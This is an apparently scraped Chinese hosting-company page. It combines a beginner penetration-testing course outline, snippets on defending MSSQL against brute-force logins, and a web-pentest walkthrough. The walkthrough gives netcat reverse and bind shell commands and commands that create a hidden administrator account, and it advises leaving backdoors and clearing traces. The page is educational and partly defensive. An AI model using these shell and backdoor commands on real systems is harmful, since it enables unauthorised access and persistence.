建站
咨詢
售后
建站咨詢
新聞中心
新手小白想學(xué)習(xí)滲透和網(wǎng)絡(luò)安全,從哪里入手?
基礎(chǔ)到入門的學(xué)習(xí)路線
讓客戶滿意是我們工作的目標(biāo),不斷超越客戶的期望值來自于我們對這個行業(yè)的熱愛。我們立志把好的技術(shù)通過有效、簡單的方式提供給客戶,將通過不懈努力成為客戶在信息化領(lǐng)域值得信任、有價值的長期合作伙伴,公司提供的服務(wù)項目有:域名申請、虛擬空間、營銷軟件、網(wǎng)站建設(shè)、德欽網(wǎng)站維護(hù)、網(wǎng)站推廣。
一、網(wǎng)絡(luò)安全
網(wǎng)絡(luò)基礎(chǔ)
網(wǎng)絡(luò)概述
(行業(yè)背景+就業(yè)方向+課程體系結(jié)構(gòu))
Vmware
IP地址的概述與應(yīng)用
DOS命令與批處理
Windows服務(wù)安全
用戶管理
破解系統(tǒng)用戶密碼
NTFS權(quán)限
文件服務(wù)器
DNS服務(wù)
DHCP服務(wù)
IIS服務(wù)
活動目錄
域控管理
組策略(一)
組策略(二)
安全策略
PKI與證書服務(wù)
windows安全基線
Windows server 2003安全配置基線
階段綜合項目一
以太網(wǎng)交換與路由技術(shù)
回顧windows服務(wù)
OSI協(xié)議簇
交換機的基本原理與配置
IP包頭分析與靜態(tài)路由
分析ARP攻擊與欺騙
虛擬局域網(wǎng)VLAN
VTP
單臂路由與DHCP
子網(wǎng)劃分VLSM
高級網(wǎng)絡(luò)技術(shù)
回顧
三層交換
ACL-1
ACL-2
網(wǎng)絡(luò)地址轉(zhuǎn)換
動態(tài)路由協(xié)議RIP
ipsec VPN
VPN遠(yuǎn)程訪問
網(wǎng)絡(luò)安全基線
Cisco基礎(chǔ)網(wǎng)絡(luò)設(shè)備安全配置基線
安全設(shè)備防護(hù)
防火墻原理及部署方式
防火墻高級配置
IDS
WAF
階段綜合項目二
二、服務(wù)安全
Linux安全運維
Linux操作系統(tǒng)介紹與安裝與目錄結(jié)構(gòu)分析
Linux系統(tǒng)的基本操作與軟件安裝
Linux系統(tǒng)下用戶以及權(quán)限管理
網(wǎng)絡(luò)配置與日志服務(wù)器建立應(yīng)急思路
建立php主頁解析以及主頁的訪問控制
Nginx服務(wù)都建立以及tomcat負(fù)載均衡
iptables包過濾與網(wǎng)絡(luò)地址轉(zhuǎn)換
實用型腳本案例
階段綜合項目三
三、代碼安全
前端代碼安全
HTML語言
CSS盒子模型
JS概述與變量
JS數(shù)據(jù)類型
JS函數(shù)
程序的流程控制
條件判斷與等值判斷結(jié)構(gòu)
循環(huán)結(jié)構(gòu)
JS數(shù)組
數(shù)據(jù)庫安全
sqlserver
access
oracle
mysql
后臺代碼安全
PHP基礎(chǔ)
PHP語法
PHP流程控制與數(shù)組
PHP代碼審計中常用函數(shù)
PHP操作mysql數(shù)據(jù)庫
PHP代碼審計(一)
PHP代碼審計(二)
Python安全應(yīng)用
初識python上篇
初識python下篇
基礎(chǔ)進(jìn)階與對象和數(shù)字
字符串列表和元祖
字典條件循環(huán)和標(biāo)準(zhǔn)輸入輸出
錯誤異常函數(shù)基礎(chǔ)
函數(shù)的高級應(yīng)用和模塊
面向?qū)ο缶幊膛c組合及派生
正則表達(dá)式和爬蟲
socket套接字
四、滲透測試
滲透測試導(dǎo)論
滲透測試方法論
法律法規(guī)與道德
Web 工作機制
HTTP 協(xié)議
Cookie 與session
同源策略
情報收集
DNS
DNS 解析
IP 查詢
主機測探與端口掃描
網(wǎng)絡(luò)漏洞掃描
Web 漏洞掃描
其他工具
口令破解
口令安全威脅
破解方式
windows 口令破解
Linux 口令破解
網(wǎng)絡(luò)服務(wù)口令破解
在線密碼查詢網(wǎng)站
常見的漏洞攻防
SQL 注入基礎(chǔ)
四大基本手法
其他注入手法
SQLmap 的使用
XSS 漏洞概述
XSS 的分類
XSS的構(gòu)造
XSS 的變形
Shellcode 的調(diào)用
XSS 通關(guān)挑戰(zhàn)
實戰(zhàn):Session 劫持
PHP 代碼執(zhí)行
OS 命令執(zhí)行
文件上傳漏洞原理概述
WebShell 概述
文件上傳漏洞的危害
常見的漏洞攻防
PUT 方法上傳文件
.htaccess 攻擊
圖片木馬的制作
upload-labs 上傳挑戰(zhàn)
Web容器解析漏洞
開源編輯器上傳漏洞
開源CMS 上傳漏洞
PHP 中的文件包含語句
文件包含示例
漏洞原理及特點
Null 字符問題
文件包含漏洞的利用
業(yè)務(wù)安全概述
業(yè)務(wù)安全測試流程
業(yè)務(wù)數(shù)據(jù)安全
密碼找回安全
CSRF
SSRF
提權(quán)與后滲透
服務(wù)器提權(quán)技術(shù)
隧道技術(shù)
緩沖區(qū)溢出原理
Metasploit Framework
前言
urllib2
SQL 注入POC 到EXP
定制EXP
案例:Oracle Weblogic CVE2017-10271 RCE
案例:JBoss AS 6.X 反序列化
五、項目實戰(zhàn)
漏洞復(fù)現(xiàn)
內(nèi)網(wǎng)靶機實戰(zhàn)
內(nèi)網(wǎng)攻防對抗
安全服務(wù)規(guī)范
安全眾測項目實戰(zhàn)
外網(wǎng)滲透測試實戰(zhàn)
六、安全素養(yǎng)
網(wǎng)絡(luò)安全行業(yè)導(dǎo)論
網(wǎng)絡(luò)安全崗位職責(zé)分析
網(wǎng)絡(luò)安全法認(rèn)知
網(wǎng)絡(luò)安全認(rèn)證
職業(yè)人素質(zhì)
大量日志 用戶 'sa' 登錄失敗. [客戶端: 123.108.110.53]
如果是動態(tài)IP的話就重啟服務(wù)器,或者把現(xiàn)用的域名關(guān)閉掉,換一個域名,如果是固定IP的話就聯(lián)系機房的工作人員,設(shè)置訪問權(quán)限。
如何遠(yuǎn)程連接服務(wù)器上的sqlserver2005
在mssql里面的網(wǎng)絡(luò)配置開啟1433端口外聯(lián),然后在服務(wù)器防火墻開啟1433端口放行,但是不推薦使用1433端口,會有太多的掃描和爆破,
web滲透是什么?
Web滲透測試分為白盒測試和黑盒測試,白盒測試是指目標(biāo)網(wǎng)站的源碼等信息的情況下對其滲透,相當(dāng)于代碼分析審計。而黑盒測試則是在對該網(wǎng)站系統(tǒng)信息不知情的情況下滲透,以下所說的Web滲透就是黑盒滲透。
Web滲透分為以下幾個步驟,信息收集,漏洞掃描,漏洞利用,提權(quán),內(nèi)網(wǎng)滲透,留后門,清理痕跡。一般的滲透思路就是看是否有注入漏洞,然后注入得到后臺管理員賬號密碼,登錄后臺,上傳小馬,再通過小馬上傳大馬,提權(quán),內(nèi)網(wǎng)轉(zhuǎn)發(fā),進(jìn)行內(nèi)網(wǎng)滲透,掃描內(nèi)網(wǎng)c段存活主機及開放端口,看其主機有無可利用漏洞(nessus)端口(nmap)對應(yīng)服務(wù)及可能存在的漏洞,對其利用(msf)拿下內(nèi)網(wǎng),留下后門,清理痕跡。或者看是否有上傳文件的地方,上傳一句話木馬,再用菜刀鏈接,拿到數(shù)據(jù)庫并可執(zhí)行cmd命令,可繼續(xù)上大馬.........思路很多,很多時候成不成功可能就是一個思路的問題,技術(shù)可以不高,思路一定得騷。
信息收集
信息收集是整個流程的重中之重,前期信息收集的越多,Web滲透的成功率就越高。
DNS域名信息:通過url獲取其真實ip,子域名(Layer子域名爆破機),旁站(K8旁站,御劍1.5),c段,網(wǎng)站負(fù)責(zé)人及其信息(whois查詢)
整站信息:服務(wù)器操作系統(tǒng)、服務(wù)器類型及版本(Apache/Nginx/Tomcat/IIS)、數(shù)據(jù)庫類型(Mysql/Oracle/Accees/Mqlserver)、腳本類型(php/jsp/asp/aspx)、CMS類型;
網(wǎng)站常見搭配為:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目錄信息(御劍,dirbust)
開放端口信息(nmp)
漏洞掃描
利用AWVS,AppScan,OWASP-ZAP,等可對網(wǎng)站進(jìn)行網(wǎng)站漏洞的初步掃描,看其是否有可利用漏洞。
常見漏洞:
SQL注入
XSS跨站腳本
CSRF跨站請求偽造
XXE(XML外部實體注入)漏洞
SSRF(服務(wù)端請求偽造)漏洞
文件包含漏洞
文件上傳漏洞
文件解析漏洞
遠(yuǎn)程代碼執(zhí)行漏洞
CORS跨域資源共享漏洞
越權(quán)訪問漏洞
目錄遍歷漏洞和任意文件讀取/下載漏洞
漏洞利用
用工具也好什么也好對相應(yīng)漏洞進(jìn)行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
后臺密碼爆破(burp)
端口爆破(hydra)
提權(quán)
獲得shell之后我們權(quán)限可能很低,因此要對自己提權(quán),可以根據(jù)服務(wù)器版本對應(yīng)的exp進(jìn)行提權(quán),對于Windows系統(tǒng)也可看其補丁對應(yīng)漏洞的exp進(jìn)行提權(quán)
內(nèi)網(wǎng)滲透
首先進(jìn)行端口轉(zhuǎn)發(fā)可用nc
nc使用方法:
反向連接
在公網(wǎng)主機上進(jìn)行監(jiān)聽:
nc-lvp 4444
在內(nèi)網(wǎng)主機上執(zhí)行:
nc-e cmd.exe 公網(wǎng)主機ip4444
成功之后即可得到一個內(nèi)網(wǎng)主機shell
正向連接
遠(yuǎn)程主機上執(zhí)行:
nc-l -p 4444 -t -e cmd.exe
本地主機上執(zhí)行:
nc-vv 遠(yuǎn)程主機ip4444
成功后,本地主機即可遠(yuǎn)程主機的一個shell
然后就是對內(nèi)網(wǎng)進(jìn)行滲透了,可以用主機漏洞掃描工具(nessus,x-scan等)進(jìn)行掃描看是否有可用漏洞,可用msf進(jìn)行利用,或者用nmap掃描存活主機及開放端口,可用hydra進(jìn)行端口爆破或者用msf對端口對應(yīng)漏洞得到shell拿下內(nèi)網(wǎng)留后門
留后門
對于網(wǎng)站上傳一句話木馬,留下后門
對于windows用戶可用hideadmin創(chuàng)建一個超級隱藏賬戶
手工:
netuser test$ 123456 /add
netlocalgroup administrators test$ /add
這樣的話在cmd命令中看不到,但在控制面板可以看到,還需要改注冊表才能實現(xiàn)控制版面也看不到,太過麻煩,不多贅述,所以還是用工具省心省力。
服務(wù)器被攻擊導(dǎo)致sqlserver.exe占CPU90%網(wǎng)站打不開,是什么攻擊如何解決,謝謝
你可以試以下幾個方法同時用,效果會好些:
1、修改MSSQL的端口號;
2、修改復(fù)雜的SA密碼,如aKLFJD13aaK_1@這一類,黑客就無法爆破了;
3、打開WIN的自帶防火墻,僅開有用的80端口和遠(yuǎn)程桌面(記住遠(yuǎn)程桌面端口也改),別開21端口。
4、關(guān)閉PING功能。
用上面的方法可以大大提高你服務(wù)器的安全,其他的防火墻有一定的作用,但會占資源。
網(wǎng)頁名稱:sqlserver爆破,sql爆庫
網(wǎng)站URL:http://www.ef60e0e.cn/article/dsehchg.html
